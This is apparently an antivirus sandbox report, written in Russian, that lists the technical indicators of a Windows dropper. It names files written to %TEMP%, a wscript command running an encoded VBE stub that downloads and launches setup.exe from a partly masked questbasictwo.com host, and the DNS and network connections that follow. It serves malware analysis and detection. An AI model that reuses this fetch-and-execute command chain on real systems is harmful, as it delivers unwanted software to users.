Техническая информация
- %TEMP%\stb1.tmp\setup.exe (загружен из сети Интернет) -i 0bce20dd5ad147f0ab6111b9d82786c0 -p QstbscWD4 /S
- <SYSTEM32>\wscript.exe /B "%TEMP%\stb2.tmp\stub.vbe" "http://up#####.questbasictwo.com/install.aspx?b=##########" "%TEMP%\stb1.tmp\setup.exe" ""%TEMP%\stb1.tmp\setup.exe" -i 0bce20dd5ad147f0ab6111b9d82786c0 -p QstbscWD4 /S" "http://up#####.questbasictwo.com/?vn#########################################################################################################################################################################################################" 0 1
- %TEMP%\stb1.tmp\setup.exe
- %TEMP%\stb2.tmp\stub.vbe
- %TEMP%\stb1.tmp\setup.exe
- %TEMP%\stb2.tmp\stub.vbe
- 'up#####.questbasictwo.com':80
- up#####.questbasictwo.com/?vn#######################################################################################################################################################################################################
- up#####.questbasictwo.com/install.aspx?b=##########
- DNS ASK up#####.questbasictwo.com
- '<IP-адрес в локальной сети>':1035